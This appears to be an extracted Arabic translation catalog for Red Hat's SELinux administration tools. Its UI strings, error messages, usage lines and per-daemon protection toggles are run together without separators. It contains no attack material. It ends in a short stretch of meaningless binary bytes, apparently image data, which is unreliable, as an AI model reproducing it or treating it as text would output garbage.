لا يمكن قراءة مخزن السياسات.تغيير حالة العملية لإلزاميتغيير حالة العملية لمتساهلتغيير نوع السياسة سيسبب إعادة عنونة ملفات النظام الكلي عند إعادة التشغيل. إعادة العنونة يمكن أن تستغرق وقتاً طويلاً، اعتماداً على حجم النظام. هل ترغب في الاستمرار؟تغيير لتعطيل SELinux يتطلب إعادة التشغيل. وهو غير مستحسن. إذا قررت في وقت لاحق لقيام SELinux بدوره مرة أخرى، النظام سيتطلب إعادة عنونة. إذا كنت ترغب لمعرفة ما إذا كان SELinux يسبب مشكلة في نظامك، يمكنك الذهاب لوضع التساهل الذي سيسجل فقط الأخطاء ولا يفرض سياسة SELinux. وضع التساهل لا يتطلب إعادة تشغيل، هل ترغب في الاستمرار؟تغيير لتمكين SELinux سوف يسبب إعادة عنونة نظام الملفات الكلي عند إعادة التشغيل. إعادة العنونة يمكن أن تستغرق وقتاً طويلاً، اعتماداً على حجم النظام. هل ترغب في الاستمرار؟توافقأعِد SELinuxسياقالحقوق محفوظة (c) 2006 Red Hat, Inc.
الحقوق محفوظة (c) 2006 Dan Walsh <dwalsh@redhat.com>لا يمكن إضافة مستخدم SELinux %sلا يمكن إضافة العنوان %sلا يمكن إضافة سياق ملف لـ %sلا يمكن إضافة الواجهة %sلا يمكن إضافة مخطط الدخول لـ %sلا يمكن إضافة المنفذ %s/%sلا يمكن إضافة البادئة %s لـ %sلا يمكن إضافة دور %s لـ %sلا يمكن التحقق من إذا كان مستخدم SELinux %s معرفالا يمكن التحقق من إذا كان العنوان %s معرفالا يمكن التحقق من إذا كانت القيمة المنطقية %s معرفةلا يمكن التحقق من إذا كان سياق الملف لـ %s معرفالا يمكن التحقق من إذا كانت الواجهة %s معرفةلا يمكن التحقق في إذا ما كان مخطط الدخول لـ %s معرفالا يمكن التحقق من إذا كان المنفذ %s/%s معرفالا يمكن إغلاق الواصفات.
لا يمكن تنفيذ عملية semanageلا يمكن إنشاء مستخدم SELinux لـ %sلا يمكن إنشاء مفتاح لـ %sلا يمكن إنشاء مفتاح لـ %s/%sلا يمكن إنشاء العنوان لـ %sلا يمكن إنشاء سياق لـ %sلا يمكن إنشاء سياق لـ %s/%sلا يمكن إنشاء سياق الملف لـ %sلا يمكن إنشاء واجهة لـ %sلا يمكن إنشاء مفتاح لـ %sلا يمكن إنشاء مخطط الدخول لـ %sلا يمكن إنشاء منفذ لـ %s/%sلا يمكن إنشاء معالج semanageلا يمكن حذف مستخدم SELinux %sلا يمكن حذف العنوان %sلا يمكن حذف القيمة المنطقية %sلا يمكن حذف سياق الملف لـ %sلا يمكن حذف الواجهة %sلا يمكن حذف تخطيط الدخول لـ %sلا يمكن حذف المنفذ %s/%sلا يمكن حذف سياق الملف %sلا يمكن حذف المنفذ %sلا يمكن تحديد ضبط الإلزام.
لا يمكن  إنشاء اتصال semanageلا يمكن استخراج مفتاح لـ %sلا يمكن عرض قائمة وحدات SELinuxلا يمكن عرض قائمة مستخدمي SELinuxلا يمكن عرض قائمة العناوينلا يمكن عرض قائمة القيم المنطقيةلا يمكن عرض قائمة سياقات الملفاتلا يمكن عرض قائمة الواجهاتلا يمكن عرض قائمة سياقات الملفات المحليةلا يمكن عرض قائمة تخطيطات الدخوللا يمكن عرض قائمة المنافذلا يمكن عرض قائمة أدوار المستخدم %sلا يمكن عرض قائمة سياقات الملفاتلا يمكن عرض قائمة المنافذلا يمكن تعديل مستخدم SELinux %sلا يمكن تعديل العنوان %sلا يمكن تعديل القيمة المنطقية %sلا يمكن تعديل سياق الملف لـ %sلا يمكن تعديل الواجهة %sلا يمكن تغيير مخطط الدخول لـ %sلا يمكن تعديل المنفذ %s/%sلا يمكن فتح الملف %s
لا يمكن استعلام العنوان %sلا يمكن استعلام سياق الملف %sلا يمكن استعلام سياق الملف لـ %sلا يمكن استعلام الواجهة %sلا يمكن استعلام المنفذ %s/%sلا يمكن استعلام seuser لـ %sلا يمكن استعلام المستخدم عن %sلا يمكن إزالة النطاق المتساهل %s (فشل في الإزالة)لا يمكن ضبط مستوى MLS لـ %sلا يمكن ضبط مدى MLS لـ %sلا يمكن ضبط مستخدم SELinux لـ %sلا يمكن ضبط القيمة المنطقية النشطة %sلا يمكن ضبط سياق العنوان لـ %sلا يمكن ضبط سياق exec لـ %s.
لا يمكن ضبط سياق ملف لـ %sلا يمكن ضبط سياق المنفذ لـ %sلا يمكن ضبط قناع لـ %sلا يمكن ضبط سياق الرسالة ل%sلا يمكن ضبط حقل mls في سياق العنوان لـ %sلا يمكن ضبط حقل mls في سياق الملف لـ %sلا يمكن ضبط حقل mls في سياق الواجهة لـ %sلا يمكن ضبط حقل mls في سياق المنفذ لـ %s/%sلا يمكن ضبط اسم لـ %sلا يمكن ضبط النطاق المتساهل %s (خطأ في تثبيت الوحدة)لا يمكن ضبط سياق المنفذ لـ %s/%sلا يمكن ضبط دور في سياق العنوان لـ %sلا يمكن ضبط دور في سياق الملف لـ %sلا يمكن ضبط دور في سياق الواجهة لـ %sلا يمكن ضبط دور في سياق المنفذ لـ %s/%sلا يمكن ضبط نوع في سياق العنوان لـ %sلا يمكن ضبط نوع في سياق الملف لـ %sلا يمكن ضبط نوع في سياق الواجهة لـ %sلا يمكن ضبط نوع في سياق المنفذ لـ %s/%sلا يمكن ضبط مستخدم في سياق العنوان لـ %sلا يمكن ضبط مستخدم في سياق الملف لـ %sلا يمكن ضبط مستخدم في سياق الواجهة لـ %sلا يمكن ضبط مستخدم في سياق المنفذ لـ %s/%sلا يمكن بدء عملية semanageلا يمكن اختبار حالة تفعيل MLSلا يمكن الحصول على النوع الافتراضي.
إنشاء/استعمال الملفات المؤقتة في /tmpCornالوضع الحالي الإلزاميمخصصخادم نظام DBUSقواعد بياناتحذف %sحذف سياق الملفحذف منفذ الشبكةحذف مخطط مستخدم SELinuxحذف مستخدموصفتعطيل التدوينمنع حماية SELinux  من أجل خادم Clusterتعطيل حماية SELnux للتقييمتعطيل حماية SELnux لخادم Halتعطيل حماية SELinux لخادم NIS Passwordتعطيل حماية SELinux لخادم NIS Transferتعطيل حماية SELinux لـ NetworkManagerتعطيل حماية SELnux لـ Thunderbirdمنع حماية SELinux لخادم acctمنع حماية SELinux  من أجل amandaمنع حماية SELinux  من أجل amavisمنع حماية SELinux  من أجل خادم apmdمنع حماية SELinux  من أجل خادم arpwatchمنع حماية SELinux  من أجل خادم auditdمنع حماية SELinux  من أجل خادم automountمنع حماية SELinux  من أجل avahiمنع حماية SELinux  من أجل خادم البلوتوثمنع حماية SELinux  من أجل خادم cannaتعطيل حماية SELinux  لخادم cardmgrتعطيل حماية SELnux لخادم cipedتعطيل حماية SELnux لخادم clamdتعطيل حماية SELnux لـ ciamscanتعطيل حماية SELnux لـ clvmdتعطيل حماية SELnux لخادم comsatتعطيل حماية SELnux لـ courierتعطيل حماية SELnux لخادم cpucontrolتعطيل حماية SELnux لخادم cpuspeedتعطيل حماية SELnux لخادم crondتعطيل حماية SELnux لخادم hplipتعطيل حماية SELnux لـ cupsd back  و الخادمتعطيل حماية SELnux لخادم cupsdتعطيل حماية SELnux cupsd lpdتعطيل حماية SELnux لخادم cvsتعطيل حماية SELnux لخادم cyrusتعطيل حماية SELnux لخادم dbskkdتعطيل حماية SELnux لخادم dbusdتعطيل حماية SELnux لـ dccdتعطيل حماية SELnux لـ dccifdتعطيل حماية SELnux لـ dccmتعطيل حماية SELnux لخادم  ddtتعطيل حماية SELnux لخادم devfsdتعطيل حماية SELnux لخادم dhcpcتعطيل حماية SELnux لخادم dhcpdتعطيل حماية SELnux لخادم dictdتعطيل حماية SELnux لخادم distccdتعطيل حماية SELnux لخادم dmesgتعطيل حماية SELnux لخادم dnsmasqتعطيل حماية SELnux لخادم dovecotتعطيل حماية SELnux لخادم entropydتعطيل حماية SELnux لخادم fetchmailتعطيل حماية SELnux لخادم fingerdتعطيل حماية SELnux لخادم freshclamتعطيل حماية SELnux لخادم fsdeamonتعطيل حماية SELnux لـ الألعابتعطيل حماية SELnux لخادم gpmتعطيل حماية SELnux لخادم gssتعطيل حماية SELnux لخادم hostnameتعطيل حماية SELnux لخادم hotplugتعطيل حماية SELnux لخادم howlتعطيل حماية SELnux لـ http suexecتعطيل حماية SELnux لـ httpd rotatelogsتعطيل حماية SELinux لخادم hwclockتعطيل حماية SELinux لخادم i18nتعطيل حماية SELinux لخادم imazesrvتعطيل حماية SELinux لأبناء خوادم inetdتعطيل حماية SELinux لخادم inetdتعطيل حماية SELinux لخادم inndتعطيل حماية SELinux لخادم iptablesتعطيل حماية SELinux لخادم ircdتعطيل حماية SELinux لخادم irqbalanceتعطيل حماية SELinux لخادم iscsiتعطيل حماية SELinux لخادم jabberdتعطيل حماية SELinux لخادم kadmindتعطيل حماية SELinux لخادم klogd تعطيل حماية SELinux لخادم krb5kdcتعطيل حماية SELinux لخادم ktalkتعطيل حماية SELinux لخادم kudzuتعطيل حماية SELinux لخادم locateتعطيل حماية SELinux لخادم lpdتعطيل حماية SELinux لخادم lrrdتعطيل حماية SELinux لخادم lvmتعطيل حماية SELinux لـ mailmanتعطيل حماية SELinux لخادم mdadmتعطيل حماية SELinux لخادم monopdتعطيل حماية SELinux لخادم mrtgتعطيل حماية SELinux لخادم mysqldتعطيل حماية SELinux لخادم nagiosتعطيل حماية SELinux لخادم namedتعطيل حماية SELinux لخادم nessusdتعطيل حماية SELinux لخادم nfsdتعطيل حماية SELinux لخادم nmbdتعطيل حماية SELinux لخادم nrpeتعطيل حماية SELinux لخادم nscdتعطيل حماية SELinux لخادم nsdتعطيل حماية SELinux لخادم ntpdتعطيل حماية SELinux لـ oddjobتعطيل حماية SELinux لـ oddjob_mkhomedirتعطيل حماية SELinux لخادم openvpnتعطيل حماية SELinux لخادم pamتعطيل حماية SELinux لـ pegasusتعطيل حماية SELinux لخادم perditionتعطيل حماية SELinux لخادم portmapتعطيل حماية SELinux لخادم portslaveتعطيل حماية SELinux لـ postfixتعطيل حماية SELinux لخادم postgresqlتعطيل حماية SELinux لـ pptpتعطيل حماية SELinux لخادم prelinkتعطيل حماية SELinux لخادم privoxyتعطيل حماية SELinux لخادم ptalتعطيل حماية SELinux لخادم pxeتعطيل حماية SELinux لـ pyzordتعطيل حماية SELinux لخادم quotaتعطيل حماية SELinux لخادم radiusdتعطيل حماية SELinux لخادم radvdتعطيل حماية SELinux لـ rdiscتعطيل حماية SELinux لـ readaheadتعطيل حماية SELinux لـ restorecondتعطيل حماية SELinux لخادم rhgbتعطيل حماية SELinux لـ ricciتعطيل حماية SELinux لـ ricci_modclusterdتعطيل حماية SELinux لخادم rlogindتعطيل حماية SELinux لخادم rpcdتعطيل حماية SELinux لـ rshdتعطيل حماية SELinux لخادم rsyncتعطيل حماية SELinux لخادم saslauthdتعطيل حماية SELinux لخادم scannerdaemonتعطيل حماية SELinux لخادم sendmailتعطيل حماية SELinux لـ setransتعطيل حماية SELinux لخادم setroubleshootتعطيل حماية SELinux لخادم slapdتعطيل حماية SELinux لخادم slrnpullتعطيل حماية SELinux لخادم smbdتعطيل حماية SELinux لخادم snmpdتعطيل حماية SELinux لخادم snortتعطيل حماية SELinux لخادم soundتعطيل حماية SELinux لخادم sounddتعطيل حماية SELinux لخادم spamdتعطيل حماية SELinux لخادم speedmgmtتعطيل حماية SELinux لخادم squidتعطيل حماية SELinux لخادم sshتعطيل حماية SELinux لخادم stunnelتعطيل حماية SELinux لخادم swatتعطيل حماية SELinux لخادم sxidتعطيل حماية SELinux لخادم syslogdتعطيل حماية SELinux لوظائف نظام cronتعطيل حماية SELinux لخادم tcpتعطيل حماية SELinux لخادم telnetتعطيل حماية SELinux لخادم tftpdتعطيل حماية SELnux لتطبيقات الأنترنتتعطيل حماية SELinux لخادم transproxyتعطيل حماية SELinux لخادم udevتعطيل حماية SELinux لخادم umlتعطيل حماية SELinux لخادم updfstabتعطيل حماية SELinux لخادم uptimedتعطيل حماية SELinux لخادم uucpdتعطيل حماية SELinux لخادم vmwareتعطيل حماية SELinux لخادم watchdogتعطيل حماية SELinux لخادم winbindتعطيل حماية SELinux لخادم xdmتعطيل حماية SELinux لتحكم xenتعطيل حماية SELinux لخادم xenتعطيل حماية SELinux لخادم xfsتعطيل حماية SELinux لخادم ypbindتعطيل حماية SELinux لخادم ypservمعطّلتعطيل
تساهل
إلزامي
لا تسمح لأي عمليات بتحميل وحدات نواة النظاملا تسمح لأي عمليات بتعديل سياسة نواة النظام SELinuxلا تسمح بالانتقال إلى sysadm_t، sudo، و su يؤثرعدم تدوين الأمور المعطوبة  ولكن ليست ذات مخاطر أمنيةتغيير منفذ الشبكةتمكين التدوينتمكين/تعطيل قواعد تدوين إضافية، التي لم يبلغ عنها عادة في ملفات السجل.إلزاميأدخل المسار الكامل للملف القابل للتنفيذ المراد حصرهأدخل المسار الكامل لبرنامج init النصي المستخدم لبدء التطبيق المحصورأدخل اسماً مميزاً للتطبيقات المحصورة أو دور المستخدم المحصورخطأ في تعيين الذاكرة.
خطأ في تعيين argv0 الخاص بالقشرة (shell).
خطأ في تغيير uid، سيتم الإلغاء.
خطأ في الاتصال بنظام التدوين.
خطأ في إسقاط قدرات SETUID، سيتم الإلغاء.
خطأ في إسقاط القدرات، سيتم الإلغاء.
خطأ في إلغاء الحروف الكبيرة
خطأ في ابتداء القدرات، سيتم الإلغاء.
خطأ في إعادة KEEPCAPS، سيتم الإلغاء.
خطأ في إرسال رسالة التدوين.
خطأ في إعداد KEEPCAPS، سيتم الإلغاء.
خطأ في إعداد القدرات، سيتم الإلغاء.
خطأ! لا يمكن فتح %s.
خطأ! القشرة (Shell) غير صالحة.
خطأ: تم تعريف أكثر من مستوى
خطأ: تم تعريف أكثر من دور
خطأ: تم تعريف أكثر من نوع
خطأ: لا يسمح لك بتغيير المستويات من خلال وحدة طرفية غير آمنة 
قابل للتنفيذأدوار المستخدم الموجودةExisting_Userفشل في إغلاق tty بصورة صحيحة
ملف
المواصفاتملف
النوعملف سياقات الملفعنونة الملفمواصفات الملفنوع الملفسياق الملف لـ %s معرف في السياسة، لا يمكن حذفهسياق الملف لـ %s غير معرفمرشحGPLالألعابإنشاء وحدة سياسة جديدةرؤية المجموعةخدمات HTTPDبرنامج Init النصييتفاعل مع الوحدة الطرفيةالواجهة %s معرفة في السياسة، لا يمكن حذفهاالواجهة %s غير معرفةملف الواجهةخادم خدمات الإنترنت (inetd)خادم خدمات الإنترنت هو خادم بُدِأ بواسطة xinetdمواصفات ملف خاطئةKerberosعنونةمجموعة لينكس %s غير موجودةمستخدم لينكس %s غير موجودرؤية القائمةوحدة سياسة التحميلتحميل وحدة السياسةتأمين...تسجيل دخول
الاسمتسجيل الدخول '%s' مطلوباسم الدخولتخطيط الدخول لـ %s معرف في السياسة، لا يمكن حذفهمخطط الدخول لـ %s غير معرّفمستوى MSCمدى MSCMLSMLS/MLS/
نطاق MCSMLS/MCS
مستوىمدى MLS/MCSحماية الذاكرةدور مستخدم الوحدة الطرفية الصغرىدور مستخدم X Windows الأدنىتعديل %sتعديل سياق الملفتغيير مخطط مستخدم SELinuxتعديل مستخدمتعديل أحد سجلات تسجيل الدخول الموجودة.وحدة %s.pp تم تحميلها في السياسة الحالية مسبقا.
هل تريد الاستمرار؟اسم الوحدةضمNFSNISالاسمخادم الأسماءإعدادات الشبكةمنفذ الشبكةلا يوجد سياق في الملف %s
عنوان العقدة مطلوبقناع شبكة العقدة مطلوبغير مطبقة بعدخطأ في الخيارات %s نفذت الذاكرة!
كلمة المرور:متساهلPolgenمجلد السياسةوحدة السياسةمنفذالمنفذ %s/%s معرف مسبقاالمنفذ %s/%s معرف في السياسة، لا يمكن حذفهالمنفذ %s/%s غير معرفةرقم المنفذالمنفذ مطلوبرقم المنفذ "%s" غير مسموح .  0 < PORT_NUMBER < 65536 المنافذ يجب أن تكون أرقاماً أو مجالات من الأرقام تبدأ من 1 إلى %dبادئةالطباعةنطاق العمليةالأولبروتوكولبروتوكول udp أو tcp مطلوبرد هات (Red Hat) 2007إعادة العنونة عند إعادة التشغيلإزالة وحدة السياسة القابلة للتحميل (ديناميكياً)يتطلب تصنيف واحد على الأقليحتاج إلى بادئة أو أدواريحتاج إلى بادئة، أدوار، مستويات أو مدىيتطلب setypeيتطلب setype أو serangeيتطلب setype، serange أو seuserبحاجة إلى seuser أو serangeإعادة ضبط الإعداد المنطقي إلى النظام الافتراضيدوردور مستخدم مدير النظامتشغيل تأمين المعالج المنطقيخادم التوثيق SASLSELinux
مستخدمإدارة SELinuxواجهة SELinuxSELinux أداة توليد السياسةمنفذ SELinux
نوعنوع منفذ SELinuxأدوار SELinuxحماية خدمة SELinuxنوع SELinuxنوع SELinux مطلوبمستخدم SELinuxقيمة منطقية لـSELinuxSELinux fcontextسياسة SELinux غير مُدارة أو لا يمكن الوصول إلى المخزن.مستخدم SELinux لـ %s معرف في السياسة، لا يمكن حذفهمستخدم SELinux %s غير معرفمستخدم SELinux '%s' مطلوبSSHSambaاختيار كائن الإدارةاختر المنافذاختر دور مستخدم مدير النظام, إذا كان سيتم استعمال المستخدم لإدارة الجهاز أثناء التشغيل كمدير النظام. هذا المستخدم لن يكون قادر على تسجيل الدخول للنظام مباشرةً.اختر المجلد الذي تريد توليد ملفات السياسة فيه اختر المجلدات التي يملكها ويكتب فيها البرنامج المقيد اختر ملف قابل للتنفيذ ليتم حصره. اختر الملفات التي ينشئها ويكتبها البرنامج المقيد حدد إذا كنت ترغب في إعادة عنونة نظام الملفات الكلي عند إعادة التشغيل.إعادة العنونة يمكن أن تستغرق وقتاً طويلاً، اعتماداً على حجم النظام.إذا كنت تقوم بتغيير أنواع السياسة أو الانتقال من تعطيل إلى إلزامي، إعادة العنونة تكون مطلوبة.اختر برنامج init النصي المراد حجزه.اختر النطاقات التي ترغب في أن يديرها هذا المستخدماختر أدوار المستخدم التي ستنتقل لمجالات التطبيقات هذهSelinux
نوع الملفعملية semanage تحت التنفيذعملية semanage ليست تحت التنفيذيرسل رسائل التدوينيرسل بريد إلكترونيإعداد البرنامج النصيعفوا، -l يمكن استعمالها مع دعم SELinux MLS.
عفوا، لا يمكن استعمال newrole إلا على نواة SELinux.
عفوا، لا يمكن استعمال run_init إلا على نواة SELinux.
الحماية ضد البريد المزعجSquidخادم Init القياسيخادم Init القياسي هو خادم يبدأ مع بداية التشغيل بواسطة برامج init النصية. عادة يتطلب برنامج نصي في /etc/rc.d/init.dالحالةوضع النظام الافتراضي إلزامينوع نظام السياسة الافتراضي:هذا المستخدم يمكن أن يسجل الدخول عن طريق X أو الوحدة الطرفية. افتراضياً هذا المستخدم لن يكون لديه setuid، ولا شبكة، ولا sudo، ولا suهذا المستخدم سيسجل الدخول للجهاز فقط عن طريق الوحدة الطرفية أو الدخول عن بُعد. افتراضياً هذا المستخدم لن يكون لديه setuid، ولا شبكة، ولا su، ولا sudo.لتفعيل حزمة السياسات هذه، نفذ:تبديل بين القيم المنطقية الكلية والمخصصةتبديل المنافذ بين الكل والمخصصةتبديل بين سياق الملف الكلي والمخصصنقل مستخدم SELinux staff (طاقم)  إلى مجال متصفح الأنترنتنقل مستخدم sysadm SELinux  إلى مجال متصفح الأنترنتنقل مستخدم SELinux إلى مجال متصفح الأنترنتنقل مستخدم xguest SELinux  إلى مجال متصفح الأنترنتالنوع %s_t معرف مسبقاً في السياسة الحالية.
هل تريد الاستمرار؟ملف إلزام النوعالنوع مطلوبالاستخدام: run_init <script> <args ...>
  عند: <script> هو اسم برنامج init النصي الذي سيعمل,
         <args ...> هي المدخلات لهذا البرنامج النصي.نوع المستخدم USER يحصل آليا على نوع tmpغير قادر على تعيين ذاكرة لـnew_contextلا يمكن في إخلاء البيئة
غير قادر على الحصول على مجموعة الإشارات الفارغة
غير قادر على استعادة البيئة، سيتم الإلغاء
غير قادر لاستعادة عنوان tty...
غير قادر على ضبط معالج SIGHUP
نفق SSL الشاملالبروتوكول غير معروف أو مفقودمنافذ غير محجوزة (>1024)الاستخدام %s -Lالاستخدام %s -L -l مستخدمالاستخدام %s -d ملف ...الاستخدام %s -l -d مستخدم ...الاستخدام %s -l CATEGORY مستخدم ...الاستخدام %s -l [[+|-]CATEGORY],...]q مستخدم ...الاستخدام %s CATEGORY ملف ...الاستخدام %s [[+|-]CATEGORY],...]q ملف ...استخدم -- لإنهاء قائمة الخيارات. على سبيل المثالتطبيقات المستخدمتطبيقات المستخدم هي أي تطبيقات تريد حصرها وقد تم تشغيلها من قبل المستخدمتخطيط المستخدمصلاحيات المستخدمدور المستخدمالمستخدم مع شبكة كاملة، لا يوجد تطبيقات setuid بدون الانتقال، ولا su، يمكن أن يستخدم sudo لأدوار مدير النظامالمستخدم مع شبكة كاملة، لا يوجد تطبيقات setuid بدون الانتقال، ولا sudo، ولا su.يستخدم Pam للتوثيقيستخدم dbusيستخدم استدعاءات nsswitch أو getpw*تحقق من الاسمإصدارتحذير! استعادة معلومات tty غير ممكنة.
تحذير! لا يمكن استعادة السياق لـ %s
تطبيق الإنترنت/البرنامج النصي (CGI)تطبيقات الأنترنتتطبيق الإنترنت/البرنامج النصي (CGI) البرنامج النصي CGI بُدِأ بواسطة خادم الأنترنت (apache)يكتب رسائل syslog	XENXServerيجب إضافة دور واحد على الأقل لـ %sيجب إدخال ملف قابل للتنفيذيجب إدخال اسم من أجل العملية/المستخدم المحصور الخاص بكيجب أن تدخل المسار القابل للتنفيذ من أجل عمليتك المحصورةيجب أن تختار مستخدماًيجب أن تحدد أحد القيم التالية: %s_حذف_خصائصكلجميع الملفات
ملف عادي
دليل
جهاز حرفي
جهاز كتلي
مقبس
اختصار
named pipe
فشل في التوثيق.
لم يتم الوجود على قيد صالح في ملف كلمات السر (passwd).
chcat -- -CompanyConfidential /docs/businessplan.odtchcat -l +CompanyConfidential juserخطأ في قراءة إعدادات خدمة PAM.
فشل في بناء مدى جديد مع مستوى %s
فشل في في تحويل السياق الجديد إلى نص
فشل في تنفيذ القشرة (shell)
خطأ في الحصول على معلومات الحساب
فشل في الحصول على سياق جديد.
فشل في الحصول على old_context.
خطأ في تهيئة PAM
خطأ في ضبط PAM_TTY
فشل في ضبط مدى جديد %s
فشل في ضبط دور جديد %s
فشل في ضبط نوع جديد %s
لم يستطع getpass فتح /dev/tty
شاملlabel37label38label39label41label42label44label50label59دور جديد: %s: خطأ في سطر %lu.
newrole: فشل في التفرع: %snewrole: كلمة المرور خاطئة لـ %s
دور جديد: جدول مختصرات إعدادات أسماء الخدمات فائضة
إلغاء التشغيلتشغيلpppdrsyncrun_init: كلمة مرور خاطئة لـ %s
system-config-selinuxtranslator-creditsنوعغير معروفالاستخدام:  %s [-qi]
use_syslog يجب أن تكون قيمة منطقية
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`